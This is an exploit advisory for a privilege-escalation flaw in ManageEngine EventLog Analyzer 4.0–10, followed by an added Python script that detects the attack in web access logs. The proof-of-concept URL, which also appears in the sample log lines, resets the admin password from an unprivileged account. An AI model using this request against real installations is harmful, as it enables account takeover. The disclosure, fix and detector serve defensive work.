"ManageEngine EventLog Analyzer 4.0 < 10 - Privilege Escalation"

Author: GraphX
Platform: multiple
Release date: 2016-02-01

# Exploit Title: ManageEngine EventLog Analyzer Privilege Escalation
# Exploit Author: @GraphX
# Vendor Homepage: http://www.manageengine.com
# Version: 4.0 - 10


1. Description:
ManageEngine EventLog Analyzer fails to properly verify user
privileges when changes are made via userManagementForm.do. An
unprivileged user is allowed to make changes to any account by
changing the USER_ID field to the number corresponding to another user.
Testing discovered that the default admin and guest accounts have
USER_ID 1 and 2.

Considering the recent similar vulnerabilities discovered in a more
current version of a similar product by ManageEngine, it is possible that
more versions of the software, including the current one, are vulnerable.
According to the vendor, this is fixed in version 10.8.


2. Proof of Concept

- Log in as an unprivileged user
- Use the following URL to change the admin password to "admin"

http://<IP_ADDRESS>/event/userManagementForm.do?addField=false&action=request.getParameter(&password=admin&email=&USER_ID=1&Submit=Save+User+Details&userName=admin


3. Solution:
Upgrade to 10.8
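
Detection logic for the flaw described above, added here as an example and not part of the original advisory: it scans web access logs for requests to userManagementForm.do whose USER_ID is not the caller's own. The log format (Combined Log Format with the authenticated login in the third field), the login-to-USER_ID map (only admin=1 and guest=2 come from the advisory) and the PRIVILEGED set are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Combined Log Format). Assumption: the third
# field carries the authenticated login name, e.g. set by a reverse proxy.
SAMPLE_LOG = """\
192.0.2.10 - jsmith [01/Feb/2016:10:00:01 +0000] "GET /event/userManagementForm.do?addField=false&password=x&email=&USER_ID=7&Submit=Save+User+Details&userName=jsmith HTTP/1.1" 200 512
192.0.2.10 - jsmith [01/Feb/2016:10:02:13 +0000] "GET /event/userManagementForm.do?addField=false&password=admin&email=&USER_ID=1&Submit=Save+User+Details&userName=admin HTTP/1.1" 200 512
192.0.2.20 - admin [01/Feb/2016:10:05:40 +0000] "GET /event/userManagementForm.do?addField=false&password=y&email=&USER_ID=7&Submit=Save+User+Details&userName=jsmith HTTP/1.1" 200 512
192.0.2.30 - guest [01/Feb/2016:10:07:02 +0000] "GET /event/index.do HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Advisory: default admin and guest are USER_ID 1 and 2. "jsmith": 7 is constructed.
USER_IDS = {"admin": 1, "guest": 2, "jsmith": 7}
PRIVILEGED = {"admin"}  # assumption: only these logins may edit other accounts


def find_cross_account_edits(log_text, user_ids=USER_IDS, privileged=PRIVILEGED):
    """Return requests to userManagementForm.do whose USER_ID is not the caller's own."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/usermanagementform.do"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        targets = set(query.get("USER_ID", []))  # every value, in case of duplicates
        actor = m["user"]
        if not targets or actor in privileged:
            continue
        own = {str(user_ids[actor])} if actor in user_ids else set()
        foreign = sorted(targets - own)  # unknown logins own nothing
        if foreign:
            findings.append({"time": m["ts"], "source": m["ip"], "actor": actor,
                             "target_ids": foreign, "status": int(m["status"]),
                             "sets_password": "password" in query})
    return findings


if __name__ == "__main__":
    for finding in find_cross_account_edits(SAMPLE_LOG):
        print(finding)
```

Access logs only show parameters sent in the query string, as in the URL above; the same change submitted in a POST body needs application or proxy body logging to be visible.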